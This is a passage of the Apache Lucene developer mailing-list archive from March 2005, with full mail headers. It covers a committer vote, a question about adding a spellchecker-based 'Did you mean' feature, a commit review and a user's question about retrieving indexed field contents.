mentor this through the incubator since you're the most Pythonic Lucene committer?! :) Erik On Mar 27, 2005, at 4:23 PM, Otis Gospodnetic wrote: > 2 x +1. > > I'd also love to see PyLucene move towards Apache Incubator, but that's > a separate thing. > > Otis > > --- Erik Hatcher <[email protected]> wrote: >> I propose two separate votes here. >> >> * Andi Vajda for committer-ship on the /contrib/db directory tree >> for >> his continued maintenance of DBDirectory, which OSAF is making solid >> use of within Chandler. >> >> * Brian McCallister for commiter-ship on a new /ruby directory tree >> to >> begin work from scratch on a GCJ/SWIG-based version of Lucene for >> Ruby. >> >> With Subversion, and Doug's control over write privileges at a >> fine-grained level, we have the capability to add committers to >> specific areas of the repository. We should leverage it! >> >> I'm +1 to both. >> >> I've CC'd both Andi and Brian. Andi - please get the ball rolling on >> >> getting an Apache CLA on file (this process can take days or even >> weeks >> to get recorded properly). http://www.apache.org/licenses/#clas - I >> >> spoke with Andi about this when I visited PyCon last week to meet him >> >> in person and we both feel that DBDirectory deserves some attention >> and >> care. >> >> Erik >> >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >> >> > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 28 04:52:16 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26607 invoked from network); 28 Mar 2005 04:52:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2005 04:52:16 -0000 Received: (qmail 27392 invoked by uid 500); 28 Mar 2005 04:52:14 -0000 Delivered-To: [email protected] Received: (qmail 27361 invoked by uid 500); 28 Mar 2005 04:52:13 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27343 invoked by uid 99); 28 Mar 2005 04:52:13 -0000 X-ASF-Spam-Status: No, hits=2.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,FORGED_YAHOO_RCVD X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from web31102.mail.mud.yahoo.com (HELO web31102.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Sun, 27 Mar 2005 20:52:12 -0800 Received: (qmail 27366 invoked by uid 60001); 28 Mar 2005 04:52:10 -0000 Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; b=4uwa4PhkWpwoOSaDhJrESY2Hts742KF54U4XaPesdCmZu39ZJO58eRO2Lr9DrOD1o6zbZxoHPtWtU+qLtFUPSOGv8BQbog40SWuSyZINMZgGUXGSaOsqaWnMTRDFrPdbpvIrah7poiJy1VfNxib75JcvVCqs4k8yexzjwgQUsvw= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web31102.mail.mud.yahoo.com via HTTP; Sun, 27 Mar 2005 20:52:09 PST Date: Sun, 27 Mar 2005 20:52:09 -0800 (PST) From: Otis Gospodnetic <[email protected]> Subject: Re: [VOTE] Two new committers To: [email protected] Cc: Andi Vajda <[email protected]>, [email protected] In-Reply-To: 6667 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N I'm spread super-thin currently, but I'll try my best. I'll start by forwarding some email from Garrett about steps he took to get lucene4c into the Incubator. Otis --- Erik Hatcher <[email protected]> wrote: > I spoke with Andi about that very topic on Friday. OSAF and he are > quite open and willing to do this, with the main reservation being > the > amount of hassle it would take to make the transition. Now that > PyCon > is over, I think he is interested in moving this forward. Otis, will > > you mentor this through the incubator since you're the most Pythonic > Lucene committer?! :) > > Erik > > > On Mar 27, 2005, at 4:23 PM, Otis Gospodnetic wrote: > > > 2 x +1. > > > > I'd also love to see PyLucene move towards Apache Incubator, but > that's > > a separate thing. > > > > Otis > > > > --- Erik Hatcher <[email protected]> wrote: > >> I propose two separate votes here. > >> > >> * Andi Vajda for committer-ship on the /contrib/db directory tree > >> for > >> his continued maintenance of DBDirectory, which OSAF is making > solid > >> use of within Chandler. > >> > >> * Brian McCallister for commiter-ship on a new /ruby directory > tree > >> to > >> begin work from scratch on a GCJ/SWIG-based version of Lucene for > >> Ruby. > >> > >> With Subversion, and Doug's control over write privileges at a > >> fine-grained level, we have the capability to add committers to > >> specific areas of the repository. We should leverage it! > >> > >> I'm +1 to both. > >> > >> I've CC'd both Andi and Brian. Andi - please get the ball rolling > on > >> > >> getting an Apache CLA on file (this process can take days or even > >> weeks > >> to get recorded properly). http://www.apache.org/licenses/#clas > - I > >> > >> spoke with Andi about this when I visited PyCon last week to meet > him > >> > >> in person and we both feel that DBDirectory deserves some > attention > >> and > >> care. > >> > >> Erik > >> > >> > >> > --------------------------------------------------------------------- > >> To unsubscribe, e-mail: [email protected] > >> For additional commands, e-mail: [email protected] > >> > >> > > > > > --------------------------------------------------------------------- > > To unsubscribe, e-mail: [email protected] > > For additional commands, e-mail: [email protected] > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 28 10:21:49 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98753 invoked from network); 28 Mar 2005 10:21:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2005 10:21:48 -0000 Received: (qmail 68681 invoked by uid 500); 28 Mar 2005 10:21:46 -0000 Delivered-To: [email protected] Received: (qmail 68636 invoked by uid 500); 28 Mar 2005 10:21:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68623 invoked by uid 99); 28 Mar 2005 10:21:46 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 28 Mar 2005 02:21:44 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id B17FE13E2122; Mon, 28 Mar 2005 05:21:39 -0500 (EST) Received: from [161.129.204.104] (va-chrvlle-cad1-bdgrp1-4b-b-169.chvlva.adelphia.net [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 7560C13E2007 for <[email protected]>; Mon, 28 Mar 2005 05:20:59 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: [VOTE] Two new committers Date: Mon, 28 Mar 2005 05:19:52 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-1.2 required=5.0 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Mar 27, 2005, at 11:52 PM, Otis Gospodnetic wrote: > I'm spread super-thin currently Welcome to the club! > , but I'll try my best. Thanks! Erik > I'll start by > forwarding some email from Garrett about steps he took to get lucene4c > into the Incubator. > > Otis > > > --- Erik Hatcher <[email protected]> wrote: >> I spoke with Andi about that very topic on Friday. OSAF and he are >> quite open and willing to do this, with the main reservation being >> the >> amount of hassle it would take to make the transition. Now that >> PyCon >> is over, I think he is interested in moving this forward. Otis, will >> >> you mentor this through the incubator since you're the most Pythonic >> Lucene committer?! :) >> >> Erik >> >> >> On Mar 27, 2005, at 4:23 PM, Otis Gospodnetic wrote: >> >>> 2 x +1. >>> >>> I'd also love to see PyLucene move towards Apache Incubator, but >> that's >>> a separate thing. >>> >>> Otis >>> >>> --- Erik Hatcher <[email protected]> wrote: >>>> I propose two separate votes here. >>>> >>>> * Andi Vajda for committer-ship on the /contrib/db directory tree >>>> for >>>> his continued maintenance of DBDirectory, which OSAF is making >> solid >>>> use of within Chandler. >>>> >>>> * Brian McCallister for commiter-ship on a new /ruby directory >> tree >>>> to >>>> begin work from scratch on a GCJ/SWIG-based version of Lucene for >>>> Ruby. >>>> >>>> With Subversion, and Doug's control over write privileges at a >>>> fine-grained level, we have the capability to add committers to >>>> specific areas of the repository. We should leverage it! >>>> >>>> I'm +1 to both. >>>> >>>> I've CC'd both Andi and Brian. Andi - please get the ball rolling >> on >>>> >>>> getting an Apache CLA on file (this process can take days or even >>>> weeks >>>> to get recorded properly). http://www.apache.org/licenses/#clas >> - I >>>> >>>> spoke with Andi about this when I visited PyCon last week to meet >> him >>>> >>>> in person and we both feel that DBDirectory deserves some >> attention >>>> and >>>> care. >>>> >>>> Erik >>>> >>>> >>>> >> --------------------------------------------------------------------- >>>> To unsubscribe, e-mail: [email protected] >>>> For additional commands, e-mail: [email protected] >>>> >>>> >>> >>> >> --------------------------------------------------------------------- >>> To unsubscribe, e-mail: [email protected] >>> For additional commands, e-mail: [email protected] >> >> >> --------------------------------------------------------------------- >> To unsubscribe, e-mail: [email protected] >> For additional commands, e-mail: [email protected] >> >> > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 28 11:58:47 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41748 invoked from network); 28 Mar 2005 11:58:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2005 11:58:47 -0000 Received: (qmail 50323 invoked by uid 500); 28 Mar 2005 11:58:43 -0000 Delivered-To: [email protected] Received: (qmail 50264 invoked by uid 500); 28 Mar 2005 11:58:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50206 invoked by uid 99); 28 Mar 2005 11:58:43 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=DNS_FROM_RFC_ABUSE,RCVD_BY_IP,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from wproxy.gmail.com (HELO wproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 28 Mar 2005 03:58:40 -0800 Received: by wproxy.gmail.com with SMTP id 67so432267wri for <[email protected]>; Mon, 28 Mar 2005 03:58:37 -0800 (PST) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding; b=aguMjMhEIs/XPFVyt/n8w1JqoE+SHRQ7iMP/r0BTBvSogZUTFYR+5JoAEObDWtX9G6zH8GdE3gAzfTv+XJXxRMoJc9koH97bVBbk4LGR4kuSpFT0ybVOuq+XHLayqpqh9Yk00SZQ5rWagrijvluHiArxZi71Gkwm36oFodFyYVA= Received: by 161.129.204.104 with SMTP id r8mr3250130wrb; Mon, 28 Mar 2005 03:58:36 -0800 (PST) Received: by 161.129.204.104 with HTTP; Mon, 28 Mar 2005 03:58:36 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 28 Mar 2005 13:58:36 +0200 From: "Stefan F. Keller" <[email protected]> Reply-To: "Stefan F. Keller" <[email protected]> To: [email protected] Subject: New "Did you mean" feature: How to approach? Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N We would like to add "Did you mean..." to our Lucene-based search engine www.geometa.info. Doug mentioned in his recent interview that this feature would be not too complicated to implement. First I considered integrating a spelling checker (through JADT-API) but one would rather expect "nearby" words which really exist in the document pool. Some people have mentioned this feature here (or on the java-user-list). => Is anyone aware of any real developments in this area? Ideally, one would combine the data already maintained by the IndexReader class with an existing similarity search algorithm (like trigram)... => Any ideas? Stefan --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 28 14:33:04 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 93879 invoked from network); 28 Mar 2005 14:33:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2005 14:33:03 -0000 Received: (qmail 12522 invoked by uid 500); 28 Mar 2005 14:33:01 -0000 Delivered-To: [email protected] Received: (qmail 12495 invoked by uid 500); 28 Mar 2005 14:33:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12482 invoked by uid 99); 28 Mar 2005 14:33:01 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from relay02.pair.com (HELO relay02.pair.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Mon, 28 Mar 2005 06:33:00 -0800 Received: (qmail 89399 invoked from network); 28 Mar 2005 14:32:58 -0000 Received: from unknown (HELO ?161.129.204.104?) (unknown) by unknown with SMTP; 28 Mar 2005 14:32:58 -0000 X-pair-Authenticated: 161.129.204.104 Message-ID: <[email protected]> Date: Mon, 28 Mar 2005 09:32:40 -0500 From: Garrett Rooney <[email protected]> User-Agent: Mozilla Thunderbird 1.0 (Windows/20041206) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: svn commit: r159237 - in lucene/java/trunk: docs/mailinglists.html xdocs/mailinglists.xml References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=UTF-8; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [email protected] wrote: > Author: otis > Date: Mon Mar 28 06:24:08 2005 > New Revision: 159237 > > URL: http://svn.apache.org/viewcvs?view=rev&rev=159237 > Log: > - Added links to other mailing lists and to all list archives > > Modified: > lucene/java/trunk/docs/mailinglists.html > lucene/java/trunk/xdocs/mailinglists.xml > > Modified: lucene/java/trunk/docs/mailinglists.html > URL: http://svn.apache.org/viewcvs/lucene/java/trunk/docs/mailinglists.html?view=diff&r1=159236&r2=159237 > ============================================================================== > --- lucene/java/trunk/docs/mailinglists.html (original) > +++ lucene/java/trunk/docs/mailinglists.html Mon Mar 28 06:24:08 2005 > @@ -130,6 +130,7 @@ > <p> > <a href="mailto:[email protected]">Subscribe</a> > <a href="mailto:[email protected]">Unsubscribe</a> > + <a href="http://mail-archives.eu.apache.org/mod_mbox/lucene-java-user/">Archive</a> You don't actually need the .eu anymore, mail-archives.a.o now points to the same place as mail-archives.eu.a.o. And btw, the reply-to on the commits list is pointed to [email protected], which doesn't exist... We should probably point that to a place that actually exists, perhaps the theoretical [email protected] list for non-language specific discussions or something like that... -garrett --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 28 15:32:22 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11087 invoked from network); 28 Mar 2005 15:32:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2005 15:32:22 -0000 Received: (qmail 94726 invoked by uid 500); 28 Mar 2005 15:32:21 -0000 Delivered-To: [email protected] Received: (qmail 94278 invoked by uid 500); 28 Mar 2005 15:32:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94264 invoked by uid 99); 28 Mar 2005 15:32:19 -0000 X-ASF-Spam-Status: No, hits=2.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,FORGED_YAHOO_RCVD X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from web31101.mail.mud.yahoo.com (HELO web31101.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Mon, 28 Mar 2005 07:32:18 -0800 Received: (qmail 78254 invoked by uid 60001); 28 Mar 2005 15:32:15 -0000 Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; b=4qFE/k1qe3e9vzREaUTv0/5ePxuuB7i7Z5vAtBABXPhiDPtcRNgZftj0BkqaInNrM+14rpTu1SroDOzxYMIuUVE1a0t7fWOoaBIB522HGGrWFCGpjw8w5R5LDog0T55Qq14uLoYJPZm4xsbZwnbrNlcEan6X7l+93uUU5xzJH9g= ; Message-ID: <[email protected]> Received: from [161.129.204.104] by web31101.mail.mud.yahoo.com via HTTP; Mon, 28 Mar 2005 07:32:15 PST Date: Mon, 28 Mar 2005 07:32:15 -0800 (PST) From: Otis Gospodnetic <[email protected]> Subject: Re: New "Did you mean" feature: How to approach? To: [email protected], "Stefan F. Keller" <[email protected]> In-Reply-To: 6667 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Maybe the spellchecker at the bottom of the following URL will help: http://svn.apache.org/repos/asf/lucene/java/trunk/contrib/ Otis --- "Stefan F. Keller" <[email protected]> wrote: > We would like to add "Did you mean..." to our Lucene-based search > engine www.geometa.info. Doug mentioned in his recent interview that > this feature would be not too complicated to implement. > > First I considered integrating a spelling checker (through JADT-API) > but one would rather expect "nearby" words which really exist in the > document pool. Some people have mentioned this feature here (or on > the > java-user-list). > > => Is anyone aware of any real developments in this area? > > Ideally, one would combine the data already maintained by the > IndexReader class with an existing similarity search algorithm (like > trigram)... > > => Any ideas? > > Stefan > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 28 15:42:10 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 16841 invoked from network); 28 Mar 2005 15:42:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2005 15:42:10 -0000 Received: (qmail 15724 invoked by uid 500); 28 Mar 2005 15:42:08 -0000 Delivered-To: [email protected] Received: (qmail 15672 invoked by uid 500); 28 Mar 2005 15:42:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 94950 invoked by uid 99); 28 Mar 2005 15:32:33 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) From: Daniel Naber <[email protected]> To: [email protected] Subject: Re: New "Did you mean" feature: How to approach? Date: Mon, 28 Mar 2005 17:33:24 +0200 User-Agent: KMail/1.8 References: <[email protected]> In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Content-Disposition: inline Message-Id: <[email protected]> X-ID: [email protected] X-TOI-MSGID: b3785d68-600e-482e-8814-bf82068ac1f3 X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Monday 28 March 2005 13:58, Stefan F. Keller wrote: > We would like to add "Did you mean..." to our Lucene-based search > engine www.geometa.info. I haven't used it,but contrib/spellchecker in SVN seems to contain such code. Regards Daniel -- http://www.danielnaber.de --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Mar 28 22:35:18 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34140 invoked from network); 28 Mar 2005 22:35:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Mar 2005 22:35:18 -0000 Received: (qmail 1465 invoked by uid 500); 28 Mar 2005 22:35:16 -0000 Delivered-To: [email protected] Received: (qmail 1006 invoked by uid 500); 28 Mar 2005 22:35:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 990 invoked by uid 500); 28 Mar 2005 22:35:15 -0000 Delivered-To: [email protected] Received: (qmail 982 invoked by uid 99); 28 Mar 2005 22:35:14 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from redwood.xs4all.nl (HELO gwnl.redwood.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 28 Mar 2005 14:35:13 -0800 Received: from localhost (gwnl [161.129.204.104]) by gwnl.redwood.com (Postfix) with ESMTP id 0DFC513FA3 for <[email protected]>; Tue, 29 Mar 2005 00:35:10 +0200 (CEST) Received: from gwnl.redwood.com ([161.129.204.104]) by localhost (gwnl [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id 23572-02 for <[email protected]>; Tue, 29 Mar 2005 00:35:06 +0200 (CEST) Received: from excus1.raleigh.us.rw (excus1 [161.129.204.104]) by gwnl.redwood.com (Postfix) with ESMTP id 02EBB13FA2 for <[email protected]>; Tue, 29 Mar 2005 00:35:05 +0200 (CEST) X-MimeOLE: Produced By Microsoft Exchange V6.5.6944.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: quoted-printable Subject: null pointer exception when try to get contents out of hits Date: Mon, 28 Mar 2005 17:35:05 -0500 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: null pointer exception when try to get contents out of hits Thread-Index: AcUdndHIxosIPEMQT8m1gxYGSkJKSAWRI0Vg From: "Xiaozheng Ma" <[email protected]> To: "Lucene Developers List" <[email protected]> X-Virus-Scanned: by amavisd-new-20030616-p10 (Debian) at redwood.com X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hi guys, I indexed the file by title and contents such as: document.add(Field.Text("title", file.getTitle())); document.add(Field.Text("contents", file.getTextContents()));=20 //the getTextContents() return the Reader type obj so far so good. I was able to search on both title and contents. Now since the title changed, I need to update the index(the contents never change). Instead of calling file.getTextContents() again, I figure that it maybe faster if I can get the reader (of contents field) back from the search hits(the original file could be huge). While <hits.doc(0).get("title")> returns title as expected =20 BUT the call on 'contents' returns null and raises null pointer exception on further action. Both=20 hits.doc(0).get("contents")=20 AND hits.doc(0).getField("contents") return null I tested that I could search on 'contents:something' and it returned the expected hit. I am using the Lucene one release before the current release. My question is: is it possible to get the Reader object (or contents text string in that matter) back after I get the hit and how. Thank you in advance! Xiaozheng --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 29 01:24:35 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61969 invoked from network); 29 Mar 2005 01:24:34 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Mar 2005 01:24:34 -0000 Received: (qmail 90810 invoked by uid 500); 29 Mar 2005 01:24:32 -0000 Delivered-To: [email protected] Received: (qmail 90641 invoked by uid 500); 29 Mar 2005 01:24:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 90622 invoked by uid 99); 29 Mar 2005 01:24:30 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from sccimhc92.asp.att.net (HELO sccimhc92.asp.att.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Mon, 28 Mar 2005 17:24:29 -0800 Received: from [161.129.204.104] (12-222-20-211.client.insightbb.com[161.129.204.104]) by sccimhc92.asp.att.net (sccimhc92) with SMTP id <20050329012426i9200qipuje>; Tue, 29 Mar 2005 01:24:26 +0000 In-Reply-To: <[email protected]> References: <[email protected]> Mime-Version: 1.0 (Apple Message framework v619.2) Content-Type: multipart/signed; micalg=sha1; boundary=Apple-Mail-26-608277279; protocol="application/pkcs7-signature" Message-Id: <[email protected]> Cc: Andi Vajda <[email protected]>, [email protected] From: Scott Ganyo <[email protected]> Subject: Re: [VOTE] Two new committers Date: Mon, 28 Mar 2005 20:24:22 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Virus-Checked: Checked X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N --Apple-Mail-26-608277279 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII; format=flowed +1 +1 On Mar 27, 2005, at 3:01 PM, Erik Hatcher wrote: > I propose two separate votes here. > > * Andi Vajda for committer-ship on the /contrib/db directory tree for > his continued maintenance of DBDirectory, which OSAF is making solid > use of within Chandler. > > * Brian McCallister for commiter-ship on a new /ruby directory tree > to begin work from scratch on a GCJ/SWIG-based version of Lucene for > Ruby. > > With Subversion, and Doug's control over write privileges at a > fine-grained level, we have the capability to add committers to > specific areas of the repository. We should leverage it! > > I'm +1 to both. > > I've CC'd both Andi and Brian. Andi - please get the ball rolling on > getting an Apache CLA on file (this process can take days or even > weeks to get recorded properly). http://www.apache.org/licenses/#clas > - I spoke with Andi about this when I visited PyCon last week to meet > him in person and we both feel that DBDirectory deserves some > attention and care. > > Erik > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > --Apple-Mail-26-608277279 Content-Transfer-Encoding: base64 Content-Type: application/pkcs7-signature; name=smime.p7s Content-Disposition: attachment; filename=smime.p7s MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIGEjCCAssw ggI0oAMCAQICAw3nejANBgkqhkiG9w0BAQQFADBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMcVGhh d3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVt YWlsIElzc3VpbmcgQ0EwHhcNMDUwMTI3MjAwMjE3WhcNMDYwMTI3MjAwMjE3WjBBMR8wHQYDVQQD ExZUaGF3dGUgRnJlZW1haWwgTWVtYmVyMR4wHAYJKoZIhvcNAQkBFg9zY290dEBnYW55by5jb20w ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDvAGBvN/BQOzkaV5E1URFgvlEmZ8knAJ3H lw4e8FSyjxwSA2fRNa1pMO+QmNWeNPrLVZ3u5bMUo4ndYiMXnHmz5u6dac173ek4zP9ZHFWTNJvl fYbgiYjUcSLn8sQH4gYHfkZpJ+kf7DI1tcinIkQOqe/7QRCvg8/YPOjm21fKHwvfMrrhjPPx/gBv MRH+KZpLEA0399tt+A+zk31okQ282AZ26NUJVFjQPBi/jP5RrXTzoSrXzgXC2tIm3k7y7xGiB3dh UgPijX1CgNHTGy2KhG4bA7pkp7WMM9IhJnVrFnU7+joNdCbCQPMad9bzAPrfqbk4M59rhcIDapXw 4+rrAgMBAAGjLDAqMBoGA1UdEQQTMBGBD3Njb3R0QGdhbnlvLmNvbTAMBgNVHRMBAf8EAjAAMA0G CSqGSIb3DQEBBAUAA4GBAFCc+yIfcFuY+NiY7+Ru0p4urDbu+ucfIOrm9B6IDneteZvj5SipGzCb WlxKLupPG2WDPTYZ2ZgWTA7IG7yeVf7q+/7y2bh0kb2EB6REG0/+4vCmILZErZfGUxOU2j6GJWSj uVQ7zMevd/yskfmT1WGuBESlnwWHAJMUd4njGPdFMIIDPzCCAqigAwIBAgIBDTANBgkqhkiG9w0B 